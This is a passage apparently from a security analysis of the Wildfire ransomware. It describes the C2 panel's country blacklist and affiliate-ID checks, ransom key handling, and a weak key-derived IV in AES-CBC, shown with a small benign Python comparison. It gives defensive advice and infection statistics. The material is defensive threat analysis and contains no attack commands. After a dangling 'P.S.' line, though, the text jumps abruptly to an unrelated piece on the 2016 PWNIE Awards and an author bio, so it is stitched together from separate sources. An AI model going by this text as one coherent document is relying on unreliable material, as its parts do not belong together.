When you are infected with Wildfire, the malware calls home to the C2 server, where information such as the IP address, username, rid and country is stored.

The botnetpanel then checks whether the country is one of the blacklisted countries (Russia, Ukraine, Belarus, Latvia, Estonia and Moldova).
It also checks whether the “rid” exists within a statically defined array (we therefore expect the rid to be an affiliate ID). If the rid is not found, or you live in one of the blacklisted countries, the malware terminates and you won’t get infected. Each time the malware calls home, a new key is generated and added to the existing list of keys.

The same victim can thus have multiple keys.

Finally the botnetpanel returns the bitcoin address to which the victim should pay, and the cryptographic key with which the files on the victim’s computer are encrypted. We don’t quite understand why a victim can have multiple keys, especially since the victim only has one bitcoin address. Also interesting is the encryption scheme.
It uses AES in CBC mode, but the key and the IV are both derived from the same key.
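A minimal sketch of why that matters (this is not Wildfire's actual code; the SHA-256 derivation is a stand-in for whatever the malware really does): with an IV derived deterministically from the key, identical plaintexts encrypted under the same key produce identical ciphertexts, which is exactly the information leak a per-message random IV is meant to prevent. The sketch uses the third-party cryptography package.

```python
# Illustrative only: deterministic (key-derived) IV vs. a fresh random IV in AES-CBC.
import hashlib
import os
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

def encrypt_cbc(key, iv, plaintext):
    """AES-CBC encrypt a block-aligned plaintext (no padding, for brevity)."""
    encryptor = Cipher(algorithms.AES(key), modes.CBC(iv)).encryptor()
    return encryptor.update(plaintext) + encryptor.finalize()

key = os.urandom(32)
plaintext = b"16-byte message."                   # exactly one AES block

# Key-derived IV (hypothetical derivation): equal inputs give equal outputs.
derived_iv = hashlib.sha256(key).digest()[:16]
print(encrypt_cbc(key, derived_iv, plaintext) == encrypt_cbc(key, derived_iv, plaintext))  # True

# Fresh random IV per message: equal inputs give different outputs.
print(encrypt_cbc(key, os.urandom(16), plaintext) == encrypt_cbc(key, os.urandom(16), plaintext))  # False
```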

Deriving the IV from the key in this way doesn't add much security and defeats the sole purpose of having an IV in the first place.

Conclusion

Even though Wildfire is a local threat, it still shows that ransomware is effective and evolving.
In less than a month we observed more than 5,700 infections, and 236 users paid a total of almost 70,000 euros.

This is also due to the fact that the spam e-mails are getting better and better. We therefore advise users to do the following:

- Be very suspicious when opening e-mails;
- Don't enable Word macros;
- Always keep your software up to date;
- Turn on Windows file extensions;
- Create offline backups (or online backups with unlimited revisions);
- Turn on the behavioral analyzer of your AV.

A decryption tool for Wildfire can be downloaded from the nomoreransom.org website. P.S. The attackers agree with us on some points:

Meet The 2016 PWNIE Award Winners

Contest celebrating the best and worst in information security marks its 10th year. (Image Source: PWNIE Awards) The PWNIE Awards turned 10 years old this year, and perhaps the most surprising thing was that nobody won Epic Fail for 2016.

Could it be that it was just too hard to top the Office of Personnel Management (OPM) hack of last year? Hard to say, but the award winners this year range from the best in security research out of the IEEE to the whimsy of the Best Song category. Here's a look at this year's winners as well as links to their research.

Steve Zurier has more than 30 years of journalism and publishing experience, most of the last 24 of which were spent covering networking and security technology.
Steve is based in Columbia, Md.